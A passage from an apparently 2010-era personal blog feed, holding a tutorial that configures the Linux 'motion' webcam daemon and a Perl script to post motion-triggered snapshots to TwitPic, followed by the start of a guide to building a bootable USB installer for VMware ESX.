/&gt;# %v = event, %q = frame number, %t = thread (camera) number,&lt;br /&gt;# %D = changed pixels, %N = noise level,&lt;br /&gt;# %i and %J = width and height of motion area,&lt;br /&gt;# %K and %L = X and Y coordinates of motion center&lt;br /&gt;# %C = value defined by text_event&lt;br /&gt;# Quotation marks round string are allowed.&lt;br /&gt;############################################################&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Target base directory for pictures and films&lt;br /&gt;# Recommended to use absolute path. (Default: current working directory)&lt;br /&gt;&lt;strong&gt;target_dir ~/motion/&lt;/strong&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# File path for snapshots (jpeg or ppm) relative to target_dir&lt;br /&gt;# Default: %v-%Y%m%d%H%M%S-snapshot&lt;br /&gt;# Default value is equivalent to legacy oldlayout option&lt;br /&gt;# For Motion 3.0 compatible mode choose: %Y/%m/%d/%H/%M/%S-snapshot&lt;br /&gt;# File extension .jpg or .ppm is automatically added so do not include this.&lt;br /&gt;# Note: A symbolic link called lastsnap.jpg created in the target_dir will always&lt;br /&gt;# point to the latest snapshot, unless snapshot_filename is exactly 'lastsnap'&lt;br /&gt;snapshot_filename %v-%Y%m%d%H%M%S-snapshot&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# File path for motion triggered images (jpeg or ppm) relative to target_dir&lt;br /&gt;# Default: %v-%Y%m%d%H%M%S-%q&lt;br /&gt;# Default value is equivalent to legacy oldlayout option&lt;br /&gt;# For Motion 3.0 compatible mode choose: %Y/%m/%d/%H/%M/%S-%q&lt;br /&gt;# File extension .jpg or .ppm is automatically added so do not include this&lt;br /&gt;# Set to 'preview' together with best-preview feature enables special naming&lt;br /&gt;# convention for preview shots. See motion guide for details&lt;br /&gt;jpeg_filename %v-%Y%m%d%H%M%S-%q&lt;br /&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;############################################################&lt;br /&gt;# &lt;a href="http://www.i-hacked.com/content/view/277/1/#" class="kLink" target="undefined" id="KonaLink4" style="color: white !important; font-weight: bold; text-decoration: underline !important; border-bottom-style: none !important; cursor: pointer; font-family: verdana; border-top-width: 0px !important; border-right-width: 0px !important; border-bottom-width: 0px !important; border-left-width: 0px !important; border-top-style: none !important; border-right-style: none !important; border-left-style: none !important; border-top-color: transparent !important; border-right-color: transparent !important; border-bottom-color: transparent !important; border-left-color: transparent !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: transparent !important; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; text-transform: none !important; display: inline !important; font-variant: normal; top: 0px; right: 0px; bottom: 0px; left: 0px; position: static; background-position: initial initial !important; "&gt;&lt;span style="color: white !important; font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: normal; font-size: 12px; position: static; color:white;"&gt;&lt;span class="kLink" style="border-top-width: 0px !important; border-top-style: none !important; border-top-color: initial !important; border-left-width: 0px !important; border-left-style: none !important; border-left-color: initial !important; border-right-width: 0px !important; border-right-style: none !important; border-right-color: initial !important; border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: initial; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 1px !important; padding-left: 0px !important; color: white !important; background-image: none; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: transparent; width: auto !important; float: none !important; display: inline !important; font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: normal; font-size: 12px; position: static; background-position: initial initial; "&gt;Live &lt;/span&gt;&lt;span class="kLink" style="border-top-width: 0px !important; border-top-style: none !important; border-top-color: initial !important; border-left-width: 0px !important; border-left-style: none !important; border-left-color: initial !important; border-right-width: 0px !important; border-right-style: none !important; border-right-color: initial !important; border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: initial; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 1px !important; padding-left: 0px !important; color: white !important; background-image: none; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: transparent; width: auto !important; float: none !important; display: inline !important; font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: normal; font-size: 12px; position: static; background-position: initial initial; "&gt;Webcam&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; Server&lt;br /&gt;############################################################&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# The mini-http &lt;a href="http://www.i-hacked.com/content/view/277/1/#" class="kLink" target="undefined" id="KonaLink5" style="color: white !important; font-weight: bold; text-decoration: underline !important; border-bottom-style: none !important; cursor: pointer; font-family: verdana; border-top-width: 0px !important; border-right-width: 0px !important; border-bottom-width: 0px !important; border-left-width: 0px !important; border-top-style: none !important; border-right-style: none !important; border-left-style: none !important; border-top-color: transparent !important; border-right-color: transparent !important; border-bottom-color: transparent !important; border-left-color: transparent !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: transparent !important; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; text-transform: none !important; display: inline !important; font-variant: normal; top: 0px; right: 0px; bottom: 0px; left: 0px; position: static; background-position: initial initial !important; "&gt;&lt;span style="color: white !important; font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: normal; font-size: 12px; position: static; color:white;"&gt;&lt;span class="kLink" style="border-top-width: 0px !important; border-top-style: none !important; border-top-color: initial !important; border-left-width: 0px !important; border-left-style: none !important; border-left-color: initial !important; border-right-width: 0px !important; border-right-style: none !important; border-right-color: initial !important; border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: initial; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 1px !important; padding-left: 0px !important; color: white !important; background-image: none; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: transparent; width: auto !important; float: none !important; display: inline !important; font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: normal; font-size: 12px; position: static; background-position: initial initial; "&gt;server&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; listens to this port for requests (default: 0 = disabled)&lt;br /&gt;webcam_port 0&lt;br /&gt;webcam_quality 50&lt;br /&gt;webcam_motion off&lt;br /&gt;webcam_maxrate 1&lt;br /&gt;webcam_localhost on&lt;br /&gt;webcam_limit 0&lt;br /&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;############################################################&lt;br /&gt;# HTTP Based Control&lt;br /&gt;############################################################&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# TCP/IP port for the http server to listen on (default: 0 = disabled)&lt;br /&gt;control_port 0&lt;br /&gt;control_localhost on&lt;br /&gt;control_html_output on&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;############################################################&lt;br /&gt;# External Commands, Warnings and Logging:&lt;br /&gt;# You can use conversion specifiers for the on_xxxx commands&lt;br /&gt;# %Y = year, %m = month, %d = date,&lt;br /&gt;# %H = hour, %M = minute, %S = second,&lt;br /&gt;# %v = event, %q = frame number, %t = thread (camera) number,&lt;br /&gt;# %D = changed pixels, %N = noise level,&lt;br /&gt;# %i and %J = width and height of motion area,&lt;br /&gt;# %K and %L = X and Y coordinates of motion center&lt;br /&gt;# %C = value defined by text_event&lt;br /&gt;# %f = filename with full path&lt;br /&gt;# %n = number indicating filetype&lt;br /&gt;# Both %f and %n are only defined for on_picture_save,&lt;br /&gt;# on_movie_start and on_movie_end&lt;br /&gt;# Quotation marks round string are allowed.&lt;br /&gt;############################################################&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Do not sound beeps when detecting motion (default: on)&lt;br /&gt;# Note: Motion never beeps when running in daemon mode.&lt;br /&gt;quiet on&lt;br /&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Command to be executed when a picture (.ppm|.jpg) is saved (default: none)&lt;br /&gt;# To give the filename as an argument to a command append it with %f&lt;br /&gt;# on_picture_save echo I would have said on save %f&lt;br /&gt;&lt;strong&gt;on_picture_save perl ~/motion/updateTwitter.pl --username YOURUSERNAME --password YOURPASSWORD --message "At %H:%M:%S Motion Was Detected" --picture %f&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Command to be executed when a camera can't be opened or if it is lost&lt;br /&gt;# NOTE: There is situations when motion doesn't detect a lost camera!&lt;br /&gt;# It depends on the driver, some drivers don't detect a lost camera at all&lt;br /&gt;# Some hang the motion thread. Some even hang the PC! (default: none)&lt;br /&gt;&lt;strong&gt;on_camera_lost perl ~/motion/updateTwitter.pl --username YOURUSERNAME --password --message "WARNING Camera Was Not Detected"&lt;/strong&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;&lt;span class="Apple-style-span" style="font-family: 'courier new', courier, monospace; "&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;h1&gt;Notification of Motion:&lt;/h1&gt;&lt;p align="left" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;Now for the fun part, if you used the above configuration file at this point your system is configured to detect motion, and then snap a picture. It also is configured to save the "best" picture, and outline the movement that it captured. Yeah so what. Lets use kick it up a notch by using Web2.0 tools to notify us so that we can take appropriate action.&lt;/p&gt;&lt;p align="left" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;First create ANOTHER (assuming you already have a twitter account) &lt;a href="https://twitter.com/signup" style="color: rgb(93, 116, 163); font-weight: bold; text-decoration: none; "&gt;twitter account&lt;/a&gt;, naming it something like mySECURITY or something that is specific to you. You will not give this name out to anyone so feel free to name it whatever you want. I gave my new twitter account an profile image of a security monkey.&lt;/p&gt;&lt;p align="center" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;&lt;img width="274" height="243" src="http://www.i-hacked.com/images/stories/twittersec/security-chimp.jpg" /&gt;&lt;/p&gt;&lt;p align="left" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;In order to upload the motion-detected captured picture utilizing twitter (and more specifically twitpic) we are going to need call a script written by rtadlock at &lt;a href="http://rtadlock.blogspot.com/" style="color: rgb(93, 116, 163); font-weight: bold; text-decoration: none; "&gt;http://rtadlock.blogspot.com&lt;/a&gt; via the motion.conf. (these lines are bolded above) Save the following as ~/motion/updateTwitter.pl&lt;/p&gt;&lt;table width="100%" cellspacing="0" cellpadding="6" border="0"&gt;&lt;tbody&gt;&lt;tr style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;&lt;td class="alt2" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: inset; border-right-style: inset; border-bottom-style: inset; border-left-style: inset; border-color: initial; "&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;#!/usr/bin/perl&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;use strict;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;use HTTP::Request::Common;&lt;br /&gt;use Getopt::Long;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# Values to use when uploading to TwitPic&lt;br /&gt;# You can change these defaults and you can&lt;br /&gt;# override them with the command line options&lt;br /&gt;my $picture;&lt;br /&gt;my $username = 'USERNAME'; # This has to be your twitter username, not your email&lt;br /&gt;my $password = 'PASSWORD'; # Twitter password&lt;br /&gt;my $message = 'New Motion Detected'; # message you'd like to post&lt;br /&gt;my $uploadOnly = 0; # Upload only, don't update Twitter&lt;br /&gt;my $verbose = 0;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# These can be changed if the TwitPic API&lt;br /&gt;# locations change&lt;br /&gt;my $uploadAndPostSite = "http://twitpic.com/api/uploadAndPost";&lt;br /&gt;my $uploadOnlySite = "http://twitpic.com/api/upload";&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;GetOptions( "help|h|?" =&gt; sub { Usage() &amp;amp;&amp;amp; exit( 0 ) },&lt;br /&gt;"picture=s" =&gt; \$picture,&lt;br /&gt;"username=s" =&gt; \$username,&lt;br /&gt;"password=s" =&gt; \$password,&lt;br /&gt;"uploadOnly" =&gt; \$uploadOnly,&lt;br /&gt;"verbose" =&gt; \$verbose,&lt;br /&gt;"message=s" =&gt; \$message ) or Usage() &amp;amp;&amp;amp; exit( -1 );&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;if( !$picture || !$username || !$password )&lt;br /&gt;{&lt;br /&gt;print "ERROR: Please provide all required arguments\n";&lt;br /&gt;Usage() &amp;amp;&amp;amp; exit( -1 );&lt;br /&gt;}&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;if( ! -e $picture || ! -f $picture )&lt;br /&gt;{&lt;br /&gt;print "ERROR: The picture you specified $picture doesn't seem to exist\n";&lt;br /&gt;exit( -1 );&lt;br /&gt;}&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;if( $verbose )&lt;br /&gt;{&lt;br /&gt;print "Attempting to upload pic to TwitPic with the following options:\n";&lt;br /&gt;print "Picture: $picture\n";&lt;br /&gt;print "Username: $username\n";&lt;br /&gt;print "Password: $password\n";&lt;br /&gt;print "Message: $message\n";&lt;br /&gt;print "Upload only: ";&lt;br /&gt;if( $uploadOnly )&lt;br /&gt;{&lt;br /&gt;print "Yes";&lt;br /&gt;}&lt;br /&gt;else&lt;br /&gt;{&lt;br /&gt;print "No";&lt;br /&gt;}&lt;br /&gt;print "\n\n";&lt;br /&gt;}&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;my $response;&lt;br /&gt;my $ua = LWP::UserAgent-&gt;new( env_proxy =&gt; 1,&lt;br /&gt;keep_alive =&gt; 1,&lt;br /&gt;timeout =&gt; 30 );&lt;br /&gt;if( $verbose )&lt;br /&gt;{&lt;br /&gt;print "Uploading picture to TwitPic.com...\n";&lt;br /&gt;}&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;if( $uploadOnly )&lt;br /&gt;{&lt;br /&gt;$response = $ua-&gt;request( POST $uploadOnlySite,&lt;br /&gt;Content_Type =&gt; 'multipart/form-data',&lt;br /&gt;Content =&gt; [&lt;br /&gt;media =&gt; ["$picture"],&lt;br /&gt;username =&gt; $username,&lt;br /&gt;password =&gt; $password ] );&lt;br /&gt;}&lt;br /&gt;else&lt;br /&gt;{&lt;br /&gt;$response = $ua-&gt;request( POST $uploadAndPostSite,&lt;br /&gt;Content_Type =&gt; 'multipart/form-data',&lt;br /&gt;Content =&gt; [&lt;br /&gt;media =&gt; ["$picture"],&lt;br /&gt;username =&gt; $username,&lt;br /&gt;password =&gt; $password,&lt;br /&gt;message =&gt; $message ] );&lt;br /&gt;}&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;if( !$response-&gt;is_success )&lt;br /&gt;{&lt;br /&gt;print "ERROR: There was a problem while trying to contact to TwitPic\n";&lt;br /&gt;die $response-&gt;status_line;&lt;br /&gt;}&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;if( $verbose )&lt;br /&gt;{&lt;br /&gt;print "Done trying to uploading picture, checking response for errors\n";&lt;br /&gt;}&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# I guess we could actually use XML::Parser to parse this, but it's kind of&lt;br /&gt;# over kill in this situation&lt;br /&gt;if( $response-&gt;content =~ /stat="fail"/ )&lt;br /&gt;{&lt;br /&gt;$response-&gt;content =~ /msg="(.*)"/;&lt;br /&gt;print "\nERROR: There was an error uploading your picture to TwitPic\n";&lt;br /&gt;print "INFO: $1\n";&lt;br /&gt;exit( -1 );&lt;br /&gt;}&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;# If verbose, print out the response, so the user can access the picture&lt;br /&gt;if( $verbose )&lt;br /&gt;{&lt;br /&gt;print "\nUploade successful, here are the details:\n";&lt;br /&gt;$response-&gt;content =~ /(.*)&lt;\/mediaid&gt;/;&lt;br /&gt;print "Media id: $1\n";&lt;br /&gt;$response-&gt;content =~ /(.*)&lt;\/mediaurl&gt;/;&lt;br /&gt;print "Media url: $1\n";&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;}&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;sub Usage()&lt;br /&gt;{&lt;br /&gt;print "\n";&lt;br /&gt;print "updateTwitter.pl --username user --password pass --picture pathToPicture [--message messageToTwitter] [--uploadOnly]\n\n";&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;print "--username\tYour Twitter.com username\n";&lt;br /&gt;print "--password\tYour Twitter.com password\n";&lt;br /&gt;print "--picture\tPath to the picture you want to post\n";&lt;br /&gt;print "--message\tOptional message to Tweet with your picture\n";&lt;br /&gt;print "--uploadOnly\tUpload to TwitPic.com only and don't Tweet. This will ignore any message passed in\n";&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;}&lt;span class="Apple-style-span" style="font-family: 'courier new', courier, monospace; "&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;h1 align="left"&gt;Putting it all together&lt;/h1&gt;&lt;p align="left" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;At this point you should have:&lt;/p&gt;&lt;ul&gt;&lt;li style="list-style-image: url(http://www.i-hacked.com/templates/akodarkgem/images/arrow.png); "&gt;motion installed&lt;/li&gt;&lt;li style="list-style-image: url(http://www.i-hacked.com/templates/akodarkgem/images/arrow.png); "&gt;motion.conf located in your ~/motion/ folder&lt;/li&gt;&lt;li style="list-style-image: url(http://www.i-hacked.com/templates/akodarkgem/images/arrow.png); "&gt;updateTwitter.pl located in your ~/motion/ folder&lt;/li&gt;&lt;li style="list-style-image: url(http://www.i-hacked.com/templates/akodarkgem/images/arrow.png); "&gt;A new twitter account created, and all relevant user/pass information updated in both motion.conf and updateTwitter.pl&lt;/li&gt;&lt;/ul&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;In your terminal type the following:&lt;/p&gt;&lt;table width="100%" cellspacing="0" cellpadding="6" border="0"&gt;&lt;tbody&gt;&lt;tr style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;&lt;td class="alt2" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: inset; border-right-style: inset; border-bottom-style: inset; border-left-style: inset; border-color: initial; "&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;&lt;span class="Apple-style-span" style="font-family: 'courier new', courier, monospace; "&gt;motion -n -c ~/motion/motion.conf&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: 'courier new', courier, monospace; "&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: 'courier new', courier, monospace; "&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div align="center" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;(-n does not allow it to go into daemon mode, and -c passes a custom configuration)&lt;br /&gt;&lt;/div&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;If everything goes right, you should start capturing images, storing them into your ~/motion/ directory, and updating your new twitter feed. Now all you need to do is simply follow your new twitter account with your original one, and allow for device updates.&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11.5px; color: rgb(204, 204, 204); "&gt;Now whenever somone comes into range of your camera, it will take a picture, upload to twitpic, and then send your cell phone a SMS message notifying you. If you have a web enabled phone, you can see the pictures in real time!&lt;/p&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-1192226118678207275?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/1192226118678207275/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/twitter-security-cam.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/1192226118678207275'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/1192226118678207275'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/twitter-security-cam.html' title='Twitter Security Cam'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-15643783694767907</id><published>2010-02-05T22:42:00.000-08:00</published><updated>2010-02-05T22:44:57.251-08:00</updated><title type='text'>Connect USB Drive to VMware ESX Server</title><content type='html'>&lt;span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px; -webkit-border-horizontal-spacing: 1px; -webkit-border-vertical-spacing: 1px; "&gt;Steps to be followed : (NOTE : I is my USB drive)&lt;br /&gt;&lt;ol style="list-style-type: decimal; "&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;Plug in your USB flash disk and format it in dos using the following command: FORMAT I: /FS:FAT&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;From Windows Explorer, find the boot.iso file in the /images directory on the ESX 3.x CD-ROM. Copy boot.iso into a temporary directory on your hard drive.&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;Using your ISO extraction or mount program, extract the contents of the boot.iso file to your USB flash drive.&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;Delete the isolinux.bin and updatecd.cfg files from the USB disk.&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;Rename the isolinux.cfg file on the USB flash disk to syslinux.cfg&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;Using WordPad (not Notepad), open the syslinux.cfg file and add the keyword usb to the end of every line that begins with append. Here's what the file should look like when you're done:&lt;br /&gt;&lt;ul&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;default esx&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;prompt 1&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;timeout 600&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;display boot.msg&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;F1 boot.msg&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;F7 snake.msg&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;label debug&lt;br /&gt;&lt;ul&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;kernel vmlinuz&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;append initrd=initrd.img noapic nomediacheck debug usb&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;label esx&lt;br /&gt;&lt;ul&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;kernel vmlinuz&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;append initrd=initrd.img usb&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;label text&lt;br /&gt;&lt;ul&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;kernel vmlinuz&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;append initrd=initrd.img text usb&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;label expert&lt;br /&gt;&lt;ul&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;kernel vmlinuz&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;append expert initrd=initrd.img usb&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;label ks&lt;br /&gt;&lt;ul&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;kernel vmlinuz&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 